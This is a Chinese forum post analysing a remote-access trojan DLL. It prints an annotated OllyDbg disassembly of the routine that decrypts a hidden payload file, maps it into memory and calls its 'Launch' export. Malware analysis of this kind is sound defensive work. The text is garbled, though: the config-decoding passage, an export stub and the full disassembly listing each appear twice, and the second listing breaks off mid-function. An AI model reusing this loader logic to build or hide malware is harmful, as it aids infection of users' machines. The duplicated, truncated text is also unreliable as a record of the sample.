[原创]记一次远控木马的分析
发表于: 2018-2-8 23:48 7259

[原创]记一次远控木马的分析

2018-2-8 23:48
7259
朋友电脑中毒,从他的电脑拷出来的...

环境: win7 x32 
工具: OD     IDA         DLL Export Viewer         LordPE



control.txt 放了一段疑似 Base64 编码后的文本

尝试解密后
解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了

解密前: N1hZMG9NTjhvVHwyMDk5MjA=

解密后: 7XY0oMN8oT|209920

temp.log里则是乱码  肯定是被加密了

help.exe  好像是vs的资源编辑器 



rcdll.dll 加了 UPX 壳,这里用 ESP 定律直接脱掉
看下他的两个导出函数
; RCDLL.Handler -- exported, but a pure stub: it returns immediately and has
; no side effects. The trailing nops are presumably alignment padding up to
; the next routine (confirm against the section layout).
100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop


; RCDLL.Handler -- exported, but a pure stub: it returns immediately and has
; no side effects. The trailing nops are presumably alignment padding up to
; the next routine (confirm against the section layout).
100012E0 RCDLL.Handler     $  C3            retn
100012E1                      90            nop
100012E2                      90            nop
100012E3                      90            nop

;-----------------------------------------------------------------------
; RCDLL.RC -- exported entry of rcdll.dll (x86, Win32 imports are stdcall,
; the internal helpers below are cdecl: the caller does `add esp,N`).
; Flow: read <module dir>\control.txt -> use its raw bytes as a mutex name
; (single-instance guard) -> Base64-decode it and keep the token before '|'
; in a global -> read <module dir>\temp.log -> decrypt it in memory -> hand
; the decrypted bytes to a loader -> resolve an export "Launch" -> call it ->
; sleep forever.
; Locals (offsets relative to esp after the four pushes):
;   [esp+0x10]  DWORD       bytes read from control.txt
;   [esp+0x14]  DWORD       bytes read from temp.log
;   [esp+0x18]  char[0x104] path = <module dir>\control.txt
;   [esp+0x11C] char[0x104] path = <module dir>\temp.log
;   [esp+0x220] char[0x104] Base64-decoded control.txt
; Registers: ebx = 0 for the whole function (used as NULL / FALSE / exit
;   code); ebp = kernel32.CloseHandle from 10001151 on; esi/edi = scratch.
; Globals written:
;   0x1000AB00 <- first '|'-delimited token of the decoded control.txt
;   0x1000AC08 <- pointer to the temp.log buffer (its ADDRESS is passed to
;                 the decrypt routine, so the pointer may be replaced)
;   0x1000AAF8 <- value returned by the loader 100014B0
; Internal calls whose names are not recovered in this listing (the
; descriptions are the author's annotations or guesses to be confirmed):
;   10001B44(size)        -> buffer of `size` bytes; presumably an allocator
;   10001310(in,len,out)  -> author: Base64 decode
;   10001AA0(str,"|")     -> presumably a strtok-style split, returns a token
;   10001000(&buf,len)    -> author: decrypt routine for temp.log
;   100014B0(ptr)         -> author: "load dll"; called again with the
;                            returned handle on the failure path (unload?)
;   10001960(h,"Launch")  -> author: GetProcAddress equivalent
; Note: no result of CreateFileA, GetFileSize, ReadFile, 10001B44 or the
; decrypt call is checked before use.
;-----------------------------------------------------------------------
100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
; ebx = 0: reused as NULL / FALSE / exit code for the rest of the function
100010CA                  |.  33DB          xor ebx,ebx
; zero 0x104 (MAX_PATH) bytes at [esp+0x18]: 1 byte + 0x40 dwords + word + byte
100010CC                  |.  B9 40000000   mov ecx,0x40
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; | same buffer: esp moved by the push above
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
; path = dirname(own module path) + "\control.txt"
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
; open control.txt read-only; the handle (edi) is never compared against
; INVALID_HANDLE_VALUE before it is used below
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax
; file size -> ebp; [esp+0x18] at this depth (two pushes) is the bytes-read
; slot [esp+0x10] of the frame, zeroed here
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; |
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax
; 10001B44(size) -> esi: buffer sized from GetFileSize; no sanity check on
; the size, and nothing visible here adds a NUL terminator
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44
1000113D                  |.  83C4 04       add esp,0x4
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax
; ReadFile(hFile, esi, size, &bytesRead, NULL); return value ignored
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
; ebp now holds CloseHandle for the rest of the function
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
; single-instance guard: the mutex name is the raw file content (the Base64
; text itself, not the decoded value)
1000115A                  |.  56            push esi                                 ; /MutexName
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA
10001163                  |.  8BF8          mov edi,eax
; 0xB7 = ERROR_ALREADY_EXISTS: another instance owns the mutex -> close the
; handle and ExitProcess(0). Any other error (e.g. a NULL handle) is ignored.
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7
10001170                  |.  75 0A         jnz short 1000117C
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess
; zero 0x104 bytes at [esp+0x220]: output buffer for the decode
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
; 10001310(in = esi, len = bytesRead, out = &[esp+0x220]); its three args are
; cleaned together with the next call's two (add esp,0x14 below)
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx
100011A2                  |.  50            push eax
100011A3                  |.  56            push esi
100011A4                  |.  E8 67010000   call 10001310                            ;  Base64 decode
; 10001AA0(decoded, "|") -> eax: presumably the token before '|' (the author
; reads it as "7XY0oMN8oT"); copied into the global at 0x1000AB00.
; OllyDbg labels the separator UNICODE, but lstrcpyA below is ANSI -- treat
; the "UNICODE" tag as a disassembler guess.
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]
100011B0                  |.  68 44800010   push 10008044                            ;  UNICODE "|"
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0
100011BB                  |.  83C4 14       add esp,0x14
100011BE                  |.  50            push eax                                 ; /String2
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA
; second MAX_PATH buffer at [esp+0x11C] = <module dir>\temp.log; the final
; `stos byte` is scheduled after the pushes (edi is unaffected by them)
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; |
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
; open temp.log read-only; again the handle (esi) is not checked
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax
; size -> edi; bytes-read slot [esp+0x14] zeroed; buffer from 10001B44 is
; kept in the global 0x1000AC08 as well as in eax
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax
; ReadFile(hFile, buf, size, &bytesRead, NULL); return value ignored
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
; CloseHandle(hFile) via ebp
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp
; 10001000(&g_buf, bytesRead): the ADDRESS of the global pointer is passed,
; not the buffer, so the routine may reallocate/replace it -- the pointer is
; re-read from the global right after the call
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ;  file size
1000126C                  |.  68 08AC0010   push 1000AC08                            ;  file buf
10001271                  |.  E8 8AFDFFFF   call 10001000                            ;  decrypt call
; 100014B0(decrypted bytes) -> handle stored at 0x1000AAF8. The argument is
; an in-memory buffer, not a path, so this looks like a manual PE mapper
; (the payload would not need to exist on disk in plaintext) -- confirm by
; reading 100014B0. add esp,0xC cleans both cdecl calls (2 + 1 args).
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ;  load dll
10001281                  |.  83C4 0C       add esp,0xC
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax
1000128B                  |.  74 3D         je short 100012CA
; 10001960(handle, "Launch") -> eax = export address or NULL
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ;  GetProcAddress: get address of Launch
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8
; Launch("Launch"): the export name string doubles as its only argument;
; the add esp,4 afterwards shows a cdecl, one-argument call
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
100012A4                  |.  FFD0          call eax                                 ;  call Launch
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
; 0x186A0 = 100000 ms: an infinite Sleep loop keeps the calling thread alive;
; RC never returns on the success path
100012AF                  |>  68 A0860100   /push 0x186A0
100012B4                  |.  FFD6          |call esi
100012B6                  |.^ EB F7         \jmp short 100012AF
; export lookup failed: 100014B0 is called again with the handle --
; presumably an unload/cleanup variant of the loader; confirm
100012B8                  |>  A1 F8AA0010   mov eax,dword ptr ds:[0x1000AAF8]
100012BD                  |.  3BC3          cmp eax,ebx
100012BF                  |.  74 09         je short 100012CA
100012C1                  |.  50            push eax
100012C2                  |.  E8 E9010000   call 100014B0
100012C7                  |.  83C4 04       add esp,0x4
; epilogue: reached only when the load or the export lookup failed
100012CA                  |>  5F            pop edi
100012CB                  |.  5E            pop esi
100012CC                  |.  5D            pop ebp
100012CD                  |.  5B            pop ebx
100012CE                  |.  81C4 14030000 add esp,0x314
100012D4                  \.  C3            retn



直接定位关键点 
(1) 读入文件目录下的control.txt
(2) 用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 作为名字创建互斥体,如果互斥体已存在(GetLastError 返回 0xB7,即 ERROR_ALREADY_EXISTS),则关闭句柄并结束进程


;-----------------------------------------------------------------------
; RCDLL.RC -- exported entry of rcdll.dll (x86, Win32 imports are stdcall,
; the internal helpers below are cdecl: the caller does `add esp,N`).
; Flow: read <module dir>\control.txt -> use its raw bytes as a mutex name
; (single-instance guard) -> Base64-decode it and keep the token before '|'
; in a global -> read <module dir>\temp.log -> decrypt it in memory -> hand
; the decrypted bytes to a loader -> resolve an export "Launch" -> call it ->
; sleep forever.
; Locals (offsets relative to esp after the four pushes):
;   [esp+0x10]  DWORD       bytes read from control.txt
;   [esp+0x14]  DWORD       bytes read from temp.log
;   [esp+0x18]  char[0x104] path = <module dir>\control.txt
;   [esp+0x11C] char[0x104] path = <module dir>\temp.log
;   [esp+0x220] char[0x104] Base64-decoded control.txt
; Registers: ebx = 0 for the whole function (used as NULL / FALSE / exit
;   code); ebp = kernel32.CloseHandle from 10001151 on; esi/edi = scratch.
; Globals written:
;   0x1000AB00 <- first '|'-delimited token of the decoded control.txt
;   0x1000AC08 <- pointer to the temp.log buffer (its ADDRESS is passed to
;                 the decrypt routine, so the pointer may be replaced)
;   0x1000AAF8 <- value returned by the loader 100014B0
; Internal calls whose names are not recovered in this listing (the
; descriptions are the author's annotations or guesses to be confirmed):
;   10001B44(size)        -> buffer of `size` bytes; presumably an allocator
;   10001310(in,len,out)  -> author: Base64 decode
;   10001AA0(str,"|")     -> presumably a strtok-style split, returns a token
;   10001000(&buf,len)    -> author: decrypt routine for temp.log
;   100014B0(ptr)         -> author: "load dll"; called again with the
;                            returned handle on the failure path (unload?)
;   10001960(h,"Launch")  -> author: GetProcAddress equivalent
; Note: no result of CreateFileA, GetFileSize, ReadFile, 10001B44 or the
; decrypt call is checked before use.
;-----------------------------------------------------------------------
100010C0 RCDLL.RC         /$  81EC 14030000 sub esp,0x314
100010C6                  |.  53            push ebx
100010C7                  |.  55            push ebp
100010C8                  |.  56            push esi
100010C9                  |.  57            push edi
; ebx = 0: reused as NULL / FALSE / exit code for the rest of the function
100010CA                  |.  33DB          xor ebx,ebx
; zero 0x104 (MAX_PATH) bytes at [esp+0x18]: 1 byte + 0x40 dwords + word + byte
100010CC                  |.  B9 40000000   mov ecx,0x40
100010D1                  |.  33C0          xor eax,eax
100010D3                  |.  8D7C24 19     lea edi,dword ptr ss:[esp+0x19]
100010D7                  |.  885C24 18     mov byte ptr ss:[esp+0x18],bl
100010DB                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100010E0                  |.  F3:AB         rep stos dword ptr es:[edi]              ; |
100010E2                  |.  66:AB         stos word ptr es:[edi]                   ; |
100010E4                  |.  AA            stos byte ptr es:[edi]                   ; |
100010E5                  |.  8D4424 1C     lea eax,dword ptr ss:[esp+0x1C]          ; | same buffer: esp moved by the push above
100010E9                  |.  50            push eax                                 ; |PathBuffer
100010EA                  |.  53            push ebx                                 ; |hModule => NULL
100010EB                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
; path = dirname(own module path) + "\control.txt"
100010F1                  |.  8D4C24 18     lea ecx,dword ptr ss:[esp+0x18]
100010F5                  |.  51            push ecx                                 ; /Path
100010F6                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
100010FC                  |.  8D5424 18     lea edx,dword ptr ss:[esp+0x18]
10001100                  |.  68 48800010   push 10008048                            ; /StringToAdd = "\control.txt"
10001105                  |.  52            push edx                                 ; |ConcatString
10001106                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
; open control.txt read-only; the handle (edi) is never compared against
; INVALID_HANDLE_VALUE before it is used below
1000110C                  |.  53            push ebx                                 ; /hTemplateFile => NULL
1000110D                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
10001112                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001114                  |.  53            push ebx                                 ; |pSecurity => NULL
10001115                  |.  6A 03         push 0x3                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117                  |.  8D4424 2C     lea eax,dword ptr ss:[esp+0x2C]          ; |
1000111B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001120                  |.  50            push eax                                 ; |FileName
10001121                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001127                  |.  8BF8          mov edi,eax
; file size -> ebp; [esp+0x18] at this depth (two pushes) is the bytes-read
; slot [esp+0x10] of the frame, zeroed here
10001129                  |.  53            push ebx                                 ; /pFileSizeHigh => NULL
1000112A                  |.  57            push edi                                 ; |hFile
1000112B                  |.  895C24 18     mov dword ptr ss:[esp+0x18],ebx          ; |
1000112F                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001135                  |.  8BE8          mov ebp,eax
; 10001B44(size) -> esi: buffer sized from GetFileSize; no sanity check on
; the size, and nothing visible here adds a NUL terminator
10001137                  |.  55            push ebp
10001138                  |.  E8 070A0000   call 10001B44
1000113D                  |.  83C4 04       add esp,0x4
10001140                  |.  8D4C24 10     lea ecx,dword ptr ss:[esp+0x10]
10001144                  |.  8BF0          mov esi,eax
; ReadFile(hFile, esi, size, &bytesRead, NULL); return value ignored
10001146                  |.  53            push ebx                                 ; /pOverlapped
10001147                  |.  51            push ecx                                 ; |pBytesRead
10001148                  |.  55            push ebp                                 ; |BytesToRead
10001149                  |.  56            push esi                                 ; |Buffer
1000114A                  |.  57            push edi                                 ; |hFile
1000114B                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
; ebp now holds CloseHandle for the rest of the function
10001151                  |.  8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C]        ;  kernel32.CloseHandle
10001157                  |.  57            push edi                                 ; /hObject
10001158                  |.  FFD5          call ebp                                 ; \CloseHandle
; single-instance guard: the mutex name is the raw file content (the Base64
; text itself, not the decoded value)
1000115A                  |.  56            push esi                                 ; /MutexName
1000115B                  |.  53            push ebx                                 ; |InitialOwner
1000115C                  |.  53            push ebx                                 ; |pSecurity
1000115D                  |.  FF15 18700010 call dword ptr ds:[0x10007018]           ; \CreateMutexA
10001163                  |.  8BF8          mov edi,eax
; 0xB7 = ERROR_ALREADY_EXISTS: another instance owns the mutex -> close the
; handle and ExitProcess(0). Any other error (e.g. a NULL handle) is ignored.
10001165                  |.  FF15 14700010 call dword ptr ds:[0x10007014]           ; [GetLastError
1000116B                  |.  3D B7000000   cmp eax,0xB7
10001170                  |.  75 0A         jnz short 1000117C
10001172                  |.  57            push edi                                 ; /hObject
10001173                  |.  FFD5          call ebp                                 ; \CloseHandle
10001175                  |.  53            push ebx                                 ; /ExitCode
10001176                  |.  FF15 10700010 call dword ptr ds:[0x10007010]           ; \ExitProcess
; zero 0x104 bytes at [esp+0x220]: output buffer for the decode
1000117C                  |>  B9 40000000   mov ecx,0x40
10001181                  |.  33C0          xor eax,eax
10001183                  |.  8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A                  |.  889C24 200200>mov byte ptr ss:[esp+0x220],bl
10001191                  |.  F3:AB         rep stos dword ptr es:[edi]
10001193                  |.  66:AB         stos word ptr es:[edi]
10001195                  |.  AA            stos byte ptr es:[edi]
; 10001310(in = esi, len = bytesRead, out = &[esp+0x220]); its three args are
; cleaned together with the next call's two (add esp,0x14 below)
10001196                  |.  8B4424 10     mov eax,dword ptr ss:[esp+0x10]
1000119A                  |.  8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1                  |.  52            push edx
100011A2                  |.  50            push eax
100011A3                  |.  56            push esi
100011A4                  |.  E8 67010000   call 10001310                            ;  Base64 decode
; 10001AA0(decoded, "|") -> eax: presumably the token before '|' (the author
; reads it as "7XY0oMN8oT"); copied into the global at 0x1000AB00.
; OllyDbg labels the separator UNICODE, but lstrcpyA below is ANSI -- treat
; the "UNICODE" tag as a disassembler guess.
100011A9                  |.  8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C]
100011B0                  |.  68 44800010   push 10008044                            ;  UNICODE "|"
100011B5                  |.  51            push ecx
100011B6                  |.  E8 E5080000   call 10001AA0
100011BB                  |.  83C4 14       add esp,0x14
100011BE                  |.  50            push eax                                 ; /String2
100011BF                  |.  68 00AB0010   push 1000AB00                            ; |String1 = RCDLL.1000AB00
100011C4                  |.  FF15 0C700010 call dword ptr ds:[0x1000700C]           ; \lstrcpyA
; second MAX_PATH buffer at [esp+0x11C] = <module dir>\temp.log; the final
; `stos byte` is scheduled after the pushes (edi is unaffected by them)
100011CA                  |.  B9 40000000   mov ecx,0x40
100011CF                  |.  33C0          xor eax,eax
100011D1                  |.  8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8                  |.  889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl
100011DF                  |.  F3:AB         rep stos dword ptr es:[edi]
100011E1                  |.  66:AB         stos word ptr es:[edi]
100011E3                  |.  8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA                  |.  68 04010000   push 0x104                               ; /BufSize = 104 (260.)
100011EF                  |.  52            push edx                                 ; |PathBuffer
100011F0                  |.  53            push ebx                                 ; |hModule
100011F1                  |.  AA            stos byte ptr es:[edi]                   ; |
100011F2                  |.  FF15 30700010 call dword ptr ds:[0x10007030]           ; \GetModuleFileNameA
100011F8                  |.  8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF                  |.  50            push eax                                 ; /Path
10001200                  |.  FF15 00710010 call dword ptr ds:[0x10007100]           ; \PathRemoveFileSpecA
10001206                  |.  8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D                  |.  68 38800010   push 10008038                            ; /StringToAdd = "\temp.log"
10001212                  |.  51            push ecx                                 ; |ConcatString
10001213                  |.  FF15 2C700010 call dword ptr ds:[0x1000702C]           ; \lstrcatA
; open temp.log read-only; again the handle (esi) is not checked
10001219                  |.  53            push ebx                                 ; /hTemplateFile
1000121A                  |.  68 80000000   push 0x80                                ; |Attributes = NORMAL
1000121F                  |.  6A 03         push 0x3                                 ; |Mode = OPEN_EXISTING
10001221                  |.  53            push ebx                                 ; |pSecurity
10001222                  |.  6A 01         push 0x1                                 ; |ShareMode = FILE_SHARE_READ
10001224                  |.  8D9424 300100>lea edx,dword ptr ss:[esp+0x130]         ; |
1000122B                  |.  68 00000080   push 0x80000000                          ; |Access = GENERIC_READ
10001230                  |.  52            push edx                                 ; |FileName
10001231                  |.  FF15 28700010 call dword ptr ds:[0x10007028]           ; \CreateFileA
10001237                  |.  8BF0          mov esi,eax
; size -> edi; bytes-read slot [esp+0x14] zeroed; buffer from 10001B44 is
; kept in the global 0x1000AC08 as well as in eax
10001239                  |.  53            push ebx                                 ; /pFileSizeHigh
1000123A                  |.  56            push esi                                 ; |hFile
1000123B                  |.  FF15 24700010 call dword ptr ds:[0x10007024]           ; \GetFileSize
10001241                  |.  8BF8          mov edi,eax
10001243                  |.  895C24 14     mov dword ptr ss:[esp+0x14],ebx
10001247                  |.  57            push edi
10001248                  |.  E8 F7080000   call 10001B44
1000124D                  |.  83C4 04       add esp,0x4
10001250                  |.  8D4C24 14     lea ecx,dword ptr ss:[esp+0x14]
10001254                  |.  A3 08AC0010   mov dword ptr ds:[0x1000AC08],eax
; ReadFile(hFile, buf, size, &bytesRead, NULL); return value ignored
10001259                  |.  53            push ebx                                 ; /pOverlapped
1000125A                  |.  51            push ecx                                 ; |pBytesRead
1000125B                  |.  57            push edi                                 ; |BytesToRead
1000125C                  |.  50            push eax                                 ; |Buffer
1000125D                  |.  56            push esi                                 ; |hFile
1000125E                  |.  FF15 20700010 call dword ptr ds:[0x10007020]           ; \ReadFile
; CloseHandle(hFile) via ebp
10001264                  |.  56            push esi
10001265                  |.  FFD5          call ebp
; 10001000(&g_buf, bytesRead): the ADDRESS of the global pointer is passed,
; not the buffer, so the routine may reallocate/replace it -- the pointer is
; re-read from the global right after the call
10001267                  |.  8B5424 14     mov edx,dword ptr ss:[esp+0x14]
1000126B                  |.  52            push edx                                 ;  file size
1000126C                  |.  68 08AC0010   push 1000AC08                            ;  file buf
10001271                  |.  E8 8AFDFFFF   call 10001000                            ;  decrypt call
; 100014B0(decrypted bytes) -> handle stored at 0x1000AAF8. The argument is
; an in-memory buffer, not a path, so this looks like a manual PE mapper
; (the payload would not need to exist on disk in plaintext) -- confirm by
; reading 100014B0. add esp,0xC cleans both cdecl calls (2 + 1 args).
10001276                  |.  A1 08AC0010   mov eax,dword ptr ds:[0x1000AC08]
1000127B                  |.  50            push eax
1000127C                  |.  E8 2F020000   call 100014B0                            ;  load dll
10001281                  |.  83C4 0C       add esp,0xC
10001284                  |.  3BC3          cmp eax,ebx
10001286                  |.  A3 F8AA0010   mov dword ptr ds:[0x1000AAF8],eax
1000128B                  |.  74 3D         je short 100012CA
; 10001960(handle, "Launch") -> eax = export address or NULL
1000128D                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
10001292                  |.  50            push eax
10001293                  |.  E8 C8060000   call 10001960                            ;  GetProcAddress: get address of Launch
10001298                  |.  83C4 08       add esp,0x8
1000129B                  |.  3BC3          cmp eax,ebx
1000129D                  |.  74 19         je short 100012B8
; Launch("Launch"): the export name string doubles as its only argument;
; the add esp,4 afterwards shows a cdecl, one-argument call
1000129F                  |.  68 30800010   push 10008030                            ;  ASCII "Launch"
100012A4                  |.  FFD0          call eax                                 ;  call Launch
100012A6                  |.  8B35 08700010 mov esi,dword ptr ds:[0x10007008]        ;  kernel32.Sleep
100012AC                  |.  83C4 04       add esp,0x4
; 0x186A0 = 100000 ms: an infinite Sleep loop keeps the calling thread alive;
; RC never returns on the success path
100012AF                  |>  68 A0860100   /push 0x186A0
100012B4                  |.  FFD6          |call esi
100012B6                  |.^ EB F7         \jmp short 100012AF
; export lookup failed: 100014B0 is called again with the handle --
; presumably an unload/cleanup variant of the loader; confirm
